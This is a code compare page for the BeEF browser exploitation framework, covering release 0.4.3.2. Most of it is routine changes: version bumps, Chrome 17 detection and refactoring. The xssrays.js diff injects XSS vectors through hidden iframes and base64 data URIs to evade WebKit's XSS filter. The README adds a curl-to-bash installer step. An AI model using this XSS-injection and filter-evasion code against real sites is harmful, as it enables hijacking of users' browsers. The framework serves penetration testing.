Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Hiddenden:beef-0.4.3.1
Branches Tags
Hiddenden:master Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1
...
compare: Hiddenden:beef-0.4.3.2
Branches Tags
Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:master Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1

47 Commits
beef-0.4.3 ... beef-0.4.3

Author SHA1 Message Date
Ben Waugh
302bb27212 Revert 041ed2b47a27655cad360397b6ca43401a027504^..HEAD 2012-02-28 09:01:29 +10:00
Ben Waugh
041ed2b47a Jenkins Test Change 2012-02-28 07:32:02 +10:00
Wade Alcorn
df0458d62e Merge branch 'master' of github.com:beefproject/beef 2012-02-26 21:35:25 +10:00
Wade Alcorn
275bbfaad2 Updates to test jenkins 2012-02-26 21:35:03 +10:00
antisnatchor
e7dd04977e Added getPhysicalLocation module written by @keith55. Adjusted config.yaml description and browser support. 2012-02-26 09:53:16 +01:00
bcoles
b6ce0cf611 Updated Detect Firebug module description 2012-02-22 20:10:38 +10:30
bcoles
fd7cee3c5c Fixed typo in logger unit test 2012-02-22 19:07:07 +10:30
bcoles
b52c3d7d19 Added unit test stubs for proxy, requester and event logger extensions. 
Fixes issue #29
Fixes issue #30
Fixes issue #33

Created a unit test stub for logger (as opposed to event_logger) to
differentiate between the main Logs tab and the event logs for each
zombie.
 2012-02-22 19:00:48 +10:30
Wade Alcorn
ec48e2647f Minor update to trigger test server 2012-02-21 06:08:15 +10:00
Wade Alcorn
5118429cb5 Overkill test for test server 2012-02-20 21:02:46 +10:00
Wade Alcorn
d010bd6d9e Extend wait time between login tests 2012-02-20 17:46:12 +10:00
bcoles
cda1659356 Improved proxy error handling. Fixes issue #92. 
The proxy now dies somewhat gracefully when given a malformed request.

The `Content-Length' header is now only matched by the parser if its
value is an integer.

A request with a null or missing HTTP version in the header now defaults
to HTTP/1.0

A request with a null or missing `Host' header returns:
  `ERROR: CrossDomain Request. The request was not sent.'
regardless of whether the host is specified in the URL.
 2012-02-19 03:42:20 +10:30
bcoles
d50b07ac56 Added Unhook module. Fixes issue #525. 2012-02-18 19:10:02 +10:30
bcoles
a9e276f50a Added Detect Firebug module. Fixes issue 497 
Moved Detect Software module from Browser to Host category
 2012-02-18 17:43:20 +10:30
Christian Frichot
791b34863e Renamed / tidied up some of the config. See Issue #82 2012-02-18 10:06:47 +08:00
Mike Haworth
fd15c108a2 Merge branch 'master' of github.com:beefproject/beef 2012-02-18 14:17:34 +13:00
Mike Haworth
5e138395d4 Partial fix for issue #100, now detects build version of flash 2012-02-18 14:17:12 +13:00
Christian Frichot
15932efcb3 Made some minor adjustments to 'os' key rating in core/module.rb. See issue #72 2012-02-18 09:06:46 +08:00
Mike Haworth
106e2dbd2d added detect software module 2012-02-18 12:22:17 +13:00
Wade Alcorn
56a9c4d04d Changed version number 2012-02-16 20:30:48 +10:00
Wade Alcorn
55b80d3b6d Merge branch 'master' of github.com:beefproject/beef 2012-02-16 08:23:39 +10:00
bcoles
8ecfa3578f Merge branch 'master' of https://github.com/beefproject/beef 2012-02-16 02:52:38 +10:30
antisnatchor
2715e0400c added browser type,version and OS to console output when a new browser is hooked in BeEF 2012-02-15 16:01:47 +01:00
Ben
667d00351d Updated README instructions for MAC OS X 2012-02-15 16:01:46 +01:00
Ben
3ad2dbb3c7 Rake task to generate DMG image 2012-02-15 16:01:46 +01:00
antisnatchor
5bc6745e03 Fixed issue 66: base64'ed the iframe src in case of Chrome/Safari to bypass the webkit anti-XSS filter 2012-02-15 16:01:46 +01:00
antisnatchor
58f2b4f7a1 Added detection of Chrome 17 2012-02-15 16:01:45 +01:00
bcoles
e5aa0671a1 Removed "notes:" node from three module config.yaml files 2012-02-15 16:01:45 +01:00
Christian Frichot
4a92d3174c Removed extended_in_modules code. See Issue #147 2012-02-15 16:01:45 +01:00
antisnatchor
61763ff103 commented out require of selenium gem. not needed and throws errors on Mac OSX 2012-02-15 16:01:45 +01:00
Saafan
e8d7293350 Listening to loopback only. Fixes issue #594 2012-02-15 16:01:44 +01:00
bcoles
805e8c8af1 Added fingerprints to Fingerprint Network module 2012-02-15 16:01:44 +01:00
Wade Alcorn
1d7ad568d2 Minor formatting update 2012-02-15 16:01:44 +01:00
antisnatchor
9489e3c591 moved imap ipec modules in a proper directory, added a note to imap ipec module about portbanning. 2012-02-15 16:01:43 +01:00
antisnatchor
d9104b93f4 removed console.log function calls that were throwing errors on IE 2012-02-15 16:01:23 +01:00
antisnatchor
55b52427e8 re-added panel.removeAll when generating a newExploitPanel, corrected typo on function name genExistingExploitPanel 2012-02-15 16:00:57 +01:00
antisnatchor
1d74d7eeab Fixed a serious bug in beef.net.request when sending cross-domain POST data. jQuery is automatically changing the method to GET if the dataType (that was hardcoded in our code) is set to 'script'. 2012-02-15 16:00:38 +01:00
antisnatchor
74d176ff73 Fixed issue 34: now only one zombie tab is created (current browser). When switching between browsers, the previous zombiePanel is destroyed. 2012-02-15 16:00:14 +01:00
Ben
def8677f1c Updated README instructions for MAC OS X 2012-02-15 17:52:54 +10:00
Ben
02bed661bb Rake task to generate DMG image 2012-02-15 17:52:08 +10:00
antisnatchor
c6988befc5 Fixed issue 66: base64'ed the iframe src in case of Chrome/Safari to bypass the webkit anti-XSS filter 2012-02-12 13:45:35 +01:00
antisnatchor
aefd251c17 Added detection of Chrome 17 2012-02-12 11:49:38 +01:00
bcoles
591cef0732 Removed "notes:" node from three module config.yaml files 2012-02-09 23:01:14 +10:30
Christian Frichot
0178a41676 Removed extended_in_modules code. See Issue #147 2012-02-07 21:24:02 +08:00
antisnatchor
476c2d0636 commented out require of selenium gem. not needed and throws errors on Mac OSX 2012-02-07 02:03:34 +01:00
Saafan
f20fd9e797 Listening to loopback only. Fixes issue #594 2012-02-06 12:00:08 +02:00
bcoles
ec0dacce28 Added fingerprints to Fingerprint Network module 2012-02-01 23:11:05 +10:30
87 changed files with 1252 additions and 421 deletions
Expand all files Collapse all files

9
README
View File

@@ -53,8 +53,13 @@ Most of the contents of this file will eventually be added to /install.rb. In th
4. Prerequisites (Mac OSX)
Make sure you have XCode installed - which provided the sqlite support BeEF needs
Sqlite support is native in MacOS 10.6+
- XCode: provides the sqlite support BeEF needs
- Ruby 1.9
To install RVM and Ruby 1.9.3 on Mac OS:
$ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile
$ rvm install 1.9.3-p0 --with-gcc=clang
$ rvm use 1.9.3
5. Install instructions

17
Rakefile
View File

@@ -135,3 +135,20 @@ file '/tmp/msf-test/msfconsole' do
sh "cd test;git clone https://github.com/rapid7/metasploit-framework.git /tmp/msf-test"
end
################################
# Create Mac DMG File
task :dmg do
puts "\nCreating Working Directory\n";
sh "mkdir dmg";
sh "mkdir dmg/BeEF";
sh "rsync * dmg/BeEF --exclude=dmg -r";
sh "ln -s /Applications dmg/";
puts "\nCreating DMG File\n"
sh "hdiutil create ./BeEF.dmg -srcfolder dmg -volname BeEF -ov";
puts "\nCleaning Up\n"
sh "rm -r dmg";
puts "\nBeEF.dmg created\n"
end

2
VERSION
View File

@@ -14,4 +14,4 @@
# limitations under the License.
#
0.4.3.1-alpha
0.4.3.2-alpha

2
beef
View File

@@ -24,7 +24,7 @@ if RUBY_VERSION < '1.9'
puts "\n"
puts "Ruby version " + RUBY_VERSION + " is no longer supported. Please upgrade 1.9 or later."
puts "OSX:"
puts "sudo port install ruby19 +nosuffix"
puts "See Readme"
puts "\n"
exit
end

2
config.yaml
View File

@@ -16,7 +16,7 @@
# BeEF Configuration file
beef:
version: '0.4.3.1-alpha'
version: '0.4.3.2-alpha'
debug: false
restrictions:

15
core/main/client/browser.js
View File

@@ -286,12 +286,20 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==16)?true:false);
},
/**
* Returns true if Chrome 17.
* @example: beef.browser.isC17()
*/
isC17: function() {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==17)?true:false);
},
/**
* Returns true if Chrome.
* @example: beef.browser.isC()
*/
isC: function() {
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16();
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17();
},
/**
@@ -355,6 +363,7 @@ beef.browser = {
C14: this.isC14(), // Chrome 14
C15: this.isC15(), // Chrome 15
C16: this.isC16(), // Chrome 16
C17: this.isC17(), // Chrome 16
C: this.isC(), // Chrome any version
FF2: this.isFF2(), // Firefox 2
@@ -408,6 +417,7 @@ beef.browser = {
if (this.isC14()) { return '14' }; // Chrome 14
if (this.isC15()) { return '15' }; // Chrome 15
if (this.isC16()) { return '16' }; // Chrome 16
if (this.isC17()) { return '17' }; // Chrome 17
if (this.isFF2()) { return '2' }; // Firefox 2
@@ -564,8 +574,7 @@ beef.browser = {
'control':'ShockwaveFlash.ShockwaveFlash',
'return': function(control) {
version = control.getVariable('$version').substring(4);
version = version.split(',');
return 'Flash Player v'+parseFloat(version[0]+'.'+version[1]);
return 'Flash Player v'+version.replace(/,/g, ".");
}},
'Quicktime':{
'control': 'QuickTime.QuickTime',

15
core/main/client/net.js
View File

@@ -168,9 +168,22 @@ beef.net = {
response.was_cross_domain = cross_domain;
var start_time = new Date().getTime();
/*
* according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
* This will turn POSTs into GETs for remote-domain requests.
*/
if (method == "POST"){
$j.ajaxSetup({
dataType: dataType
});
}else{ //GET, HEAD, ...
$j.ajaxSetup({
dataType: 'script'
});
}
//build and execute the request
$j.ajax({type: method,
dataType: 'script', // this is required for bugs in IE so data can be transferred back to the server
url: url,
data: data,
timeout: (timeout * 1000),

31
core/main/client/net/xssrays.js
View File

@@ -308,7 +308,10 @@ beef.net.xssrays = {
var ray = this.rays[beef.net.xssrays.uniqueID];
var paramsPos = 0;
if (params != null) { // check for XSS in GET parameters
if (params != null) {
/*
* ++++++++++ check for XSS in URI parameters (GET) ++++++++++
*/
for (var i in params) {
if (params.hasOwnProperty(i)) {
@@ -328,12 +331,19 @@ beef.net.xssrays = {
exploit = vector.input.replace(/XSS/g, beefCallback);
url += i + '=' + (urlencode ? encodeURIComponent(exploit) : exploit) + '&';
if(beef.browser.isC() || beef.browser.isS()){ //we will base64 the whole uri later
url += i + '=' + exploit + '&';
}else{
url += i + '=' + (urlencode ? encodeURIComponent(exploit) : exploit) + '&';
}
paramsPos++;
}
}
} else { // check for XSS in GET URL path
} else {
/*
* ++++++++++ check for XSS in URI path (GET) ++++++++++
*/
var filename = beef.net.xssrays.fileName(url);
poc = vector.input.replace(/XSS/g, "alert(1)");
@@ -352,8 +362,9 @@ beef.net.xssrays = {
//TODO: this need to checked and the slash shouldn't be added in this particular case
url = url.replace(filename, filename + '/' + (urlencode ? encodeURIComponent(exploit) : exploit) + '/');
}
/*
* ++++++++++ create the iFrame that will contain the attack vector ++++++++++
*/
var iframe = document.createElement('iframe');
iframe.style.display = 'none';
iframe.id = 'ray' + beef.net.xssrays.uniqueID;
@@ -361,10 +372,18 @@ beef.net.xssrays = {
iframe.name = 'ray' + Math.random().toString();
if (method === 'GET') {
iframe.src = url;
if(beef.browser.isC() || beef.browser.isS()){
var datauri = btoa(url);
iframe.src = "data:text/html;base64," + datauri;
}else{
iframe.src = url;
}
document.body.appendChild(iframe);
beef.net.xssrays.printDebug("Creating XSS iFrame with src [" + iframe.src + "], id[" + iframe.id + "], time [" + iframe.time + "]");
} else if (method === 'POST') {
/*
* ++++++++++ check for XSS in body parameters (POST) ++++++++++
*/
var form = '<form action="' + beef.net.xssrays.escape(action) + '" method="post" id="frm">';
poc = '';
pocurl = action + "?";

343
core/main/command.rb
View File

@@ -15,208 +15,199 @@
#
module BeEF
module Core
module Core
# @note This module contains a list of utils functions to use when writing commands
module CommandUtils
# Format a string to support multiline in javascript.
# @param [String] text String to convert
# @return [String] Formatted string
def format_multiline(text); text.gsub(/\n/, '\n'); end
end
# @note This module contains a list of utils functions to use when writing commands
module CommandUtils
# Format a string to support multiline in javascript.
# @param [String] text String to convert
# @return [String] Formatted string
def format_multiline(text); text.gsub(/\n/, '\n'); end
# @note The Command Module Context is being used when evaluating code in eruby.
# In other words, we use that code to add funky functions to the
# javascript templates of our commands.
class CommandContext < Erubis::Context
include BeEF::Core::CommandUtils
# Constructor
# @param [Hash] hash
def initialize(hash=nil);
super(hash);
end
end
# @note This class is the base class for all command modules in the framework.
# Two instances of this object are created during the execution of command module.
class Command
attr_reader :datastore, :path, :default_command_url, :beefjs_components, :friendlyname
attr_accessor :zombie, :command_id, :session_id
include BeEF::Core::CommandUtils
include BeEF::Core::Constants::Browsers
include BeEF::Core::Constants::CommandModule
# Super class controller
# @param [String] key command module key
def initialize(key)
get_extensions
config = BeEF::Core::Configuration.instance
@key = key
@datastore = {}
@friendlyname = config.get("beef.module.#{key}.name")
@output = ''
@path = config.get("beef.module.#{key}.path")
@default_command_url = config.get("beef.module.#{key}.mount")
@id = config.get("beef.module.#{key}.db.id")
@auto_update_zombie = false
@results = {}
@beefjs_components = {}
end
# Uses the API to include all the code from extensions that need to add methods, constants etc to that class.
# @todo Determine if this method is deprecated
def get_extensions
BeEF::API::Command.extended_in_modules.each do |mod|
self.class.send(:include, mod)
# @note The Command Module Context is being used when evaluating code in eruby.
# In other words, we use that code to add funky functions to the
# javascript templates of our commands.
class CommandContext < Erubis::Context
include BeEF::Core::CommandUtils
# Constructor
# @param [Hash] hash
def initialize(hash=nil);
super(hash);
end
end
# This function is called just before the instructions are sent to hooked browser.
def pre_send; end
# Callback method. This function is called when the hooked browser sends results back.
def callback; end
# If the command requires some data to be sent back, this function will process them.
# @param [] head
# @param [Hash] params Hash of parameters
# @todo Determine argument "head" type
def process_zombie_response(head, params); end
# Returns true if the command needs configurations to work. False if not.
# @deprecated This command should not be used since the implementation of the new configuration system
def needs_configuration?; !@datastore.nil?; end
# Returns information about the command in a JSON format.
# @return [String] JSON formatted string
def to_json
{
'Name' => @friendlyname,
'Description' => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.description"),
'Category' => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.category"),
'Data' => BeEF::Module.get_options(@key)
}.to_json
end
# Builds the 'datastore' attribute of the command which is used to generate javascript code.
# @param [Hash] data Data to be inserted into the datastore
# @todo Confirm argument "data" type
def build_datastore(data);
@datastore = JSON.parse(data)
end
# Sets the datastore for the callback function. This function is meant to be called by the CommandHandler
# @param [Hash] http_params HTTP parameters
# @param [Hash] http_headers HTTP headers
def build_callback_datastore(http_params, http_headers)
@datastore = {'http_headers' => {}} # init the datastore
# get, check and add the http_params to the datastore
http_params.keys.each { |http_params_key|
(print_error 'http_params_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_params_key)
http_params_value = Erubis::XmlHelper.escape_xml(http_params[http_params_key])
(print_error 'http_params_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_params_value)
@datastore[http_params_key] = http_params_value # add the checked key and value to the datastore
}
# get, check and add the http_headers to the datastore
http_headers.keys.each { |http_header_key|
(print_error 'http_header_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_header_key)
http_header_value = Erubis::XmlHelper.escape_xml(http_headers[http_header_key][0])
(print_error 'http_header_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_header_value)
@datastore['http_headers'][http_header_key] = http_header_value # add the checked key and value to the datastore
}
end
# Returns the output of the command. These are the actual instructions sent to the browser.
# @return [String] The command output
def output
# @note This class is the base class for all command modules in the framework.
# Two instances of this object are created during the execution of command module.
class Command
attr_reader :datastore, :path, :default_command_url, :beefjs_components, :friendlyname
attr_accessor :zombie, :command_id, :session_id
include BeEF::Core::CommandUtils
include BeEF::Core::Constants::Browsers
include BeEF::Core::Constants::CommandModule
# Super class controller
# @param [String] key command module key
def initialize(key)
config = BeEF::Core::Configuration.instance
@key = key
@datastore = {}
@friendlyname = config.get("beef.module.#{key}.name")
@output = ''
@path = config.get("beef.module.#{key}.path")
@default_command_url = config.get("beef.module.#{key}.mount")
@id = config.get("beef.module.#{key}.db.id")
@auto_update_zombie = false
@results = {}
@beefjs_components = {}
end
# This function is called just before the instructions are sent to hooked browser.
def pre_send; end
# Callback method. This function is called when the hooked browser sends results back.
def callback; end
# If the command requires some data to be sent back, this function will process them.
# @param [] head
# @param [Hash] params Hash of parameters
# @todo Determine argument "head" type
def process_zombie_response(head, params); end
# Returns true if the command needs configurations to work. False if not.
# @deprecated This command should not be used since the implementation of the new configuration system
def needs_configuration?; !@datastore.nil?; end
# Returns information about the command in a JSON format.
# @return [String] JSON formatted string
def to_json
{
'Name' => @friendlyname,
'Description' => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.description"),
'Category' => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.category"),
'Data' => BeEF::Module.get_options(@key)
}.to_json
end
# Builds the 'datastore' attribute of the command which is used to generate javascript code.
# @param [Hash] data Data to be inserted into the datastore
# @todo Confirm argument "data" type
def build_datastore(data);
@datastore = JSON.parse(data)
end
# Sets the datastore for the callback function. This function is meant to be called by the CommandHandler
# @param [Hash] http_params HTTP parameters
# @param [Hash] http_headers HTTP headers
def build_callback_datastore(http_params, http_headers)
@datastore = {'http_headers' => {}} # init the datastore
# get, check and add the http_params to the datastore
http_params.keys.each { |http_params_key|
(print_error 'http_params_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_params_key)
http_params_value = Erubis::XmlHelper.escape_xml(http_params[http_params_key])
(print_error 'http_params_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_params_value)
@datastore[http_params_key] = http_params_value # add the checked key and value to the datastore
}
# get, check and add the http_headers to the datastore
http_headers.keys.each { |http_header_key|
(print_error 'http_header_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_header_key)
http_header_value = Erubis::XmlHelper.escape_xml(http_headers[http_header_key][0])
(print_error 'http_header_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_header_value)
@datastore['http_headers'][http_header_key] = http_header_value # add the checked key and value to the datastore
}
end
# Returns the output of the command. These are the actual instructions sent to the browser.
# @return [String] The command output
def output
f = @path+'command.js'
(print_error "#{f} file does not exist";return) if not File.exists? f
command = BeEF::Core::Models::Command.first(:id => @command_id)
@eruby = Erubis::FastEruby.new(File.read(f))
@eruby = Erubis::FastEruby.new(File.read(f))
data = BeEF::Core::Configuration.instance.get("beef.module.#{@key}")
cc = BeEF::Core::CommandContext.new
cc['command_url'] = @default_command_url
cc['command_id'] = @command_id
JSON.parse(command['data']).each{|v|
cc[v['name']] = v['value']
cc[v['name']] = v['value']
}
if self.respond_to?(:execute)
self.execute
self.execute
end
@output = @eruby.evaluate(cc)
@output
end
# Saves the results received from the hooked browser
# @param [Hash] results Results from hooked browser
def save(results)
@results = results
end
# If nothing else than the file is specified, the function will map the file to a random path without any extension.
# @param [String] file File to be mounted
# @param [String] path URL path to mounted file
# @param [String] extension URL extension
# @param [Integer] count The amount of times this file can be accessed before being automatically unmounted
# @deprecated This function is possibly deprecated in place of the API
def map_file_to_url(file, path=nil, extension=nil, count=1)
return BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(file, path, extension, count)
end
# Tells the framework to load a specific module of the BeEFJS library that the command will be using.
# @param [String] component String of BeEFJS component to load
# @note Example: use 'beef.net.local'
def use(component)
return if @beefjs_components.include? component
component_path = '/'+component
component_path.gsub!(/beef./, '')
component_path.gsub!(/\./, '/')
component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
raise "Invalid beefjs component for command module #{@path}" if not File.exists?(component_path)
@beefjs_components[component] = component_path
end
@output
end
# @todo Document
def oc_value(name)
# Saves the results received from the hooked browser
# @param [Hash] results Results from hooked browser
def save(results)
@results = results
end
# If nothing else than the file is specified, the function will map the file to a random path without any extension.
# @param [String] file File to be mounted
# @param [String] path URL path to mounted file
# @param [String] extension URL extension
# @param [Integer] count The amount of times this file can be accessed before being automatically unmounted
# @deprecated This function is possibly deprecated in place of the API
def map_file_to_url(file, path=nil, extension=nil, count=1)
return BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(file, path, extension, count)
end
# Tells the framework to load a specific module of the BeEFJS library that the command will be using.
# @param [String] component String of BeEFJS component to load
# @note Example: use 'beef.net.local'
def use(component)
return if @beefjs_components.include? component
component_path = '/'+component
component_path.gsub!(/beef./, '')
component_path.gsub!(/\./, '/')
component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
raise "Invalid beefjs component for command module #{@path}" if not File.exists?(component_path)
@beefjs_components[component] = component_path
end
# @todo Document
def oc_value(name)
option = BeEF::Core::Models::OptionCache.first(:name => name)
return nil if not option
return option.value
end
return nil if not option
return option.value
end
# @todo Document
def apply_defaults()
@datastore.each { |opt|
opt["value"] = oc_value(opt["name"]) || opt["value"]
}
end
private
@use_template
@eruby
@update_zombie
@results
end
# @todo Document
def apply_defaults()
@datastore.each { |opt|
opt["value"] = oc_value(opt["name"]) || opt["value"]
}
end
private
@use_template
@eruby
@update_zombie
@results
end
end
end

154
core/main/configuration.rb
View File

@@ -15,115 +15,115 @@
#
module BeEF
module Core
module Core
class Configuration
include Singleton
# Loads the default configuration system
# @param [String] configuration_file Configuration file to be loaded, by default loads $root_dir/config.yaml
def initialize(configuration_file="#{$root_dir}/config.yaml")
# argument type checking
raise Exception::TypeError, '"configuration_file" needs to be a string' if not configuration_file.string?
# test to make sure file exists
raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(configuration_file)
begin
#open base config
@config = self.load(configuration_file)
# set default value if key? does not exist
@config.default = nil
rescue Exception => e
print_error "Fatal Error: cannot load configuration file"
print_debug e
class Configuration
include Singleton
# Loads the default configuration system
# @param [String] configuration_file Configuration file to be loaded, by default loads $root_dir/config.yaml
def initialize(configuration_file="#{$root_dir}/config.yaml")
# argument type checking
raise Exception::TypeError, '"configuration_file" needs to be a string' if not configuration_file.string?
# test to make sure file exists
raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(configuration_file)
begin
#open base config
@config = self.load(configuration_file)
# set default value if key? does not exist
@config.default = nil
rescue Exception => e
print_error "Fatal Error: cannot load configuration file"
print_debug e
end
end
end
# Loads yaml file
# @param [String] file YAML file to be loaded
# @return [Hash] YAML formatted hash
def load(file)
begin
return nil if not File.exists?(file)
raw = File.read(file)
return YAML.load(raw)
rescue Exception => e
print_debug "Unable to load '#{file}' #{e}"
return nil
# Loads yaml file
# @param [String] file YAML file to be loaded
# @return [Hash] YAML formatted hash
def load(file)
begin
return nil if not File.exists?(file)
raw = File.read(file)
return YAML.load(raw)
rescue Exception => e
print_debug "Unable to load '#{file}' #{e}"
return nil
end
end
end
# Returns the value of a selected key in the configuration file.
# @param [String] key Key of configuration item
# @return [Hash|String] The resulting value stored against the 'key'
def get(key)
# Returns the value of a selected key in the configuration file.
# @param [String] key Key of configuration item
# @return [Hash|String] The resulting value stored against the 'key'
def get(key)
subkeys = key.split('.')
lastkey = subkeys.pop
subhash = subkeys.inject(@config) do |hash, k|
hash[k]
hash[k]
end
return (subhash != nil and subhash.has_key?(lastkey)) ? subhash[lastkey] : nil
end
return (subhash != nil and subhash.has_key?(lastkey)) ? subhash[lastkey] : nil
end
# Sets the give key value pair to the config instance
# @param [String] key The configuration key
# @param value The value to be stored against the 'key'
# @return [Boolean] If the store procedure was successful
def set(key, value)
# Sets the give key value pair to the config instance
# @param [String] key The configuration key
# @param value The value to be stored against the 'key'
# @return [Boolean] If the store procedure was successful
def set(key, value)
subkeys = key.split('.').reverse
return false if subkeys.length == 0
hash = {subkeys.shift.to_s => value}
subkeys.each{|v|
hash = {v.to_s => hash}
hash = {v.to_s => hash}
}
@config = @config.deep_merge(hash)
return true
end
end
# Clears the given key hash
# @param [String] key Configuration key to be cleared
# @return [Boolean] If the configuration key was cleared
def clear(key)
# Clears the given key hash
# @param [String] key Configuration key to be cleared
# @return [Boolean] If the configuration key was cleared
def clear(key)
subkeys = key.split('.')
return false if subkeys.length == 0
lastkey = subkeys.pop
hash = @config
subkeys.each{|v|
hash = hash[v]
hash = hash[v]
}
return (hash.delete(lastkey) == nil) ? false : true
end
return (hash.delete(lastkey) == nil) ? false : true
end
# Load extensions configurations
def load_extensions_config
# Load extensions configurations
def load_extensions_config
self.set('beef.extension', {})
Dir.glob("#{$root_dir}/extensions/*/config.yaml") do | cf |
y = self.load(cf)
if y != nil
y['beef']['extension'][y['beef']['extension'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
@config = y.deep_merge(@config)
else
print_error "Unable to load extension configuration '#{cf}'"
end
y = self.load(cf)
if y != nil
y['beef']['extension'][y['beef']['extension'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
@config = y.deep_merge(@config)
else
print_error "Unable to load extension configuration '#{cf}'"
end
end
end
end
# Load module configurations
def load_modules_config
# Load module configurations
def load_modules_config
self.set('beef.module', {})
Dir.glob("#{$root_dir}/modules/**/*/config.yaml") do | cf |
y = self.load(cf)
if y != nil
y['beef']['module'][y['beef']['module'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
@config = y.deep_merge(@config)
# API call for post module config load
BeEF::API::Registrar.instance.fire(BeEF::API::Configuration, 'module_configuration_load', y['beef']['module'].keys.first)
else
print_error "Unable to load module configuration '#{cf}'"
end
y = self.load(cf)
if y != nil
y['beef']['module'][y['beef']['module'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
@config = y.deep_merge(@config)
# API call for post module config load
BeEF::API::Registrar.instance.fire(BeEF::API::Configuration, 'module_configuration_load', y['beef']['module'].keys.first)
else
print_error "Unable to load module configuration '#{cf}'"
end
end
end
end
end
end
end
end

33
core/module.rb
View File

@@ -208,10 +208,13 @@ module BeEF
case v
when String
if opts['browser'] == v
# if k == BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING
# rating += 1
# end
